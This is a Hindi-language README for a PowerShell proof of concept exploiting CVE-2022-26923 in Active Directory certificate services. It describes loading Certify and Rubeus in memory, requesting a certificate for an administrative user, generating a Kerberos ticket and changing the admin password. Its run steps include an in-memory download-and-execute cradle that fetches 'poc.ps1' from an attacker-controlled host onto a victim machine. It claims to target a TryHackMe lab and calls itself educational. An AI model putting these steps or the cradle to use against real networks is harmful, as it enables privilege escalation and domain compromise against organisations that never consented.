CVE-2022-26923-Powershell-POC
Certify और Rubeus को मेमोरी से लोड करने और स्वचालित रूप से चलाने के लिए एक PowerShell POC।
यह कैसे काम करता है?
- Certify.exe और Rubeus.exe को मेमोरी में लोड करता है।
- लक्ष्य मशीन पर गलत कॉन्फ़िगर की गई प्रमाणपत्र टेम्पलेट्स को स्कैन करता है। (अधिक जानकारी के लिए https://www.youtube.com/watch?v=HBRCI5O35R8)
- कमजोर टेम्पलेट के आधार पर, प्रशासनिक उपयोगकर्ता के लिए एक प्रमाणपत्र का अनुरोध करता है।
- प्रमाणपत्र को प्रमाणपत्र हैंडलर को भेजता है, यह इसे .pfx प्रारूप में बदलता है और इसे क्लाइंट को वापस भेजता है।
- प्रमाणपत्र को लोड करने और प्रशासनिक उपयोगकर्ता के लिए एक टिकट उत्पन्न करने के लिए Rubeus का उपयोग करता है।
- प्रशासनिक उपयोगकर्ता का पासवर्ड बदलता है। (केवल डेमो के लिए)
POC निम्नलिखित TryHackMe Labs पर परीक्षण किया गया है: https://tryhackme.com/room/adcertificatetemplates
यह CVE विशेषाधिकार वृद्धि (privilege escalation) के लिए उपयोग किया जाता है, इसलिए इस डेमो या THM Lab में कोई प्रारंभिक शोषण (initial exploitation) शामिल नहीं है।
चरण:
- python3 -m http.server 80 [हमलावर बॉक्स]
- python3 uploader.py 8000 [हमलावर बॉक्स]
- IEX(New-Object Net.WebClient).DownloadString('http://IP/poc.ps1') [पीड़ित बॉक्स]
नोट: यह POC शैक्षिक उद्देश्य के लिए है, आप अपने कार्यों के लिए स्वयं जिम्मेदार हैं।